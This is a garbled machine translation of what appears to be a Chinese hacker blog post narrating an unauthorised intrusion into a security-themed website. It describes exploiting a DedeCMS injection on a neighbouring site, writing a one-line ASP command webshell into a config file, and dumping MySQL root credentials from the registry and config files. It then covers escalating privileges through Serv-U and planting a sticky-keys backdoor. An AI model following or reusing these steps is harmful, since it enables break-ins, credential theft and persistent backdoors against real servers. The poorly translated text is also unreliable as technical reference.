Difficult privilege escalation for a security station

Author: Aini road @ Shadow technology team www.anying.org reprinted please note, otherwise the investigation to the end.

Today, someone sent me a website, which is a security station. Although it is not very active, it is worth a try.

The target site has no obvious vulnerability in discuz x2.5 .. About 40 sites under the same ip address .. Find a site. When you look at the green box, you will feel like a dream. Add a dede behind the website to find the default backend, Which is 5.7. Check the date in data/admin/ver.txt and use that search to inject 0-day flash.

I don't need to talk about getting shell in the background. I can directly write a php sentence to the website. First, I can see the form on asp, and WS will write a fork, okay .. Then I looked at the writable directory. After half a day, I finally found a C: \ wmpub. I checked asp.net, which is supported by php. I can directly change the aspx Trojan Set command to execute it.

Ipconfig net user does not support any commands. Check whether iis_spy is disabled. The target is the hacker station, so I first try to switch to the target station from a different directory, and add uc_server/control/admin/db. php after the connection, the physical path is exposed.
Run echo ^ <% execute (request ("cmd") % ^> D: the \ web \ xxxxxx \ wwwroot \ config \ ky1235.php command is successfully executed, but cannot be connected in one sentence .. So copy the pony directly to the target path and run the copy command.

If you win the game, try to raise the right .. First look at the port opened a lot ..

You can read the Registry. First check that the terminal port is 3884. Now that you can execute the cmd command, try overflow first. Change to aspx horse .. Pr, barbecue, and so on, no echo .. Systeminfo: At first glance, there are 413 patches, and the overflow is not estimated. Another way of thinking, since 43958 is enabled, try serv-u to directly escalate permissions, and suFTP, failed .. The password should have been changed. The next idea is to use the set command to expose the mysql path. The kitchen knife can directly query the root password in the user configuration file in the data file of the mysql path across directories... Can be decrypted... I think it's okay to win the game. I threw it to the permanent root to raise the privilege. Export results failed... Next, let's look at the Registry to see if there is any sensitive information .. As soon as you see a key value in the Registry, the eyes are bright.

You can directly find the mysql password by using the Privilege Escalation method of the Huazhong host .. At first glance, the column of mssqlpss is empty. When I think of it, port 1433 is not opened at all. I guess there may be no sa .. Mastersvrpass cannot be connected .. Okay... Suddenly, I don't know the path of serv-u. I think the path of the host in huazu is D: \ Server_Core \ hzhost. Will the path of serv-u be in this path, as a result, the file manager does not have sufficient permissions to browse .. Run the dir command in cmd to check the file. After reading it, serv-u is in the server_core directory. Check the configuration file and try to connect to su exp with the password .. Directly add the account and password. It seems silly and disabled ..

Try another account and it will still be disabled ....



How is this possible .. Doesn't the Administrator manage him remotely .. Puzzled. So I thought of the shift backdoor, which was always executed with su exp, and was done successfully .. In fact, using the Administrator's account and password to connect to ftp has the write permission, you can directly transfer the Trojan to execute, but there is no trojan at hand, all are put to the end. Well, there is no technical content. It may be a bit wrong.